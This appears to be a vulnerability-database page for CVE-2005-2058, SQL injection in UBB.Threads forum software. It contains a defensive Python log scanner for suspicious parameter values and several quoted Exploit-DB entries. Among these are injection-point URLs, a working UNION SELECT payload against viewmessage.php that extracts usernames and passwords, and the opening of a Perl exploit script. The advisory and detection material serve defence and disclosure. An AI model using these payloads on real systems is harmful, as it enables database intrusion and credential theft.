CVE-2005-2058
Published 2005-06-29
Priority: P3 36 | Severity: high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.24% (65.3th percentile)
Multiple SQL injection vulnerabilities in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to execute arbitrary SQL commands via the Number parameter to (1) download.php, (2) modifypost.php, (3) mailthread.php, or (4) notifymod.php, (5) month or (6) year parameter to calendar.php, (7) message parameter to viewmessage.php, (8) main parameter to addfav.php, or (9) posted parameter to grabnext.php.
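A log check for the script and parameter pairs listed above, as an added example that is not part of the original record or of UBB.Threads. It assumes combined-format access logs and that legitimate values for these parameters are short non-negative integers; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> parameters named in the CVE-2005-2058 description.
WATCHED = {
    "download.php": ("Number",),
    "modifypost.php": ("Number",),
    "mailthread.php": ("Number",),
    "notifymod.php": ("Number",),
    "calendar.php": ("month", "year"),
    "viewmessage.php": ("message",),
    "addfav.php": ("main",),
    "grabnext.php": ("posted",),
}
# Assumption: legitimate values are short non-negative integers.
NUMERIC = re.compile(r"[0-9]{1,12}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def suspicious_params(target):
    """Return (script, param, decoded value) for watched params that are not plain integers."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    query = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes values
    return [(script, name, value)
            for name in WATCHED.get(script, ())
            for value in query.get(name, [])
            if value and not NUMERIC.fullmatch(value)]

def scan(log_lines):
    """Return (line number, script, param, value) for every flagged request."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if m:
            findings.extend((lineno, *hit) for hit in suspicious_params(m.group(1)))
    return findings

# Constructed sample lines (documentation IP range, invented timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jul/2005:10:00:01 +0000] "GET /ubbt/download.php?Number=42227 HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jul/2005:10:00:05 +0000] "GET /ubbt/download.php?Number=42227%27 HTTP/1.1" 200 87',
    '198.51.100.9 - - [01/Jul/2005:10:00:09 +0000] "GET /ubbt/calendar.php?Cat=7&month=6&year=2005%20-- HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jul/2005:10:00:12 +0000] "GET /ubbt/showflat.php?Number=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the query string.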
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubbcentral | ubb.threads | — | — |
No detection rules found.
Exploit-DB
UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection
exploitdb·2005-06-25
UBBCentral UBB.Threads Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke
#
# And Iranian Hacking & Security Teams :
# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,
# Crouz Security Team & Simorgh-ev Security Team
#############################################################################
# ___________Config :
# please replace your address :
$url = "http:///www.example.com";
# please replace your dir address :
$dirs = "/dir/to/ubbt/";
# __________End Config
#############################################################################
$aa = strlen ( $dirs );
$ab = $aa - 1;
$ac = 0;
if (( $dirs[$ab] == "/" ) && ( $dirs[$ac] == "/" )) {
$merg = $dirs.mailthread.php;
$fc = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$fc) {
echo "Can't Connect\n";
} else {
$m
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection
exploitdb·2005-06-24
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection
exploitdb·2005-06-24
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection
exploitdb·2005-06-24
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections
exploitdb·2005-06-24
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
http://www.example.com/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection
exploitdb·2005-06-24
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection
exploitdb·2005-06-24
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat
Exploit-DB
UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection
exploitdb·2005-06-24
---
source: https://www.securityfocus.com/bid/14052/info
UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/ubbt/download.php?Number=42227[SQL]
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111963737202040&w=2
http://www.gulftech.org/?node=research&article_id=00084-06232005
http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351
Published: 2005-06-29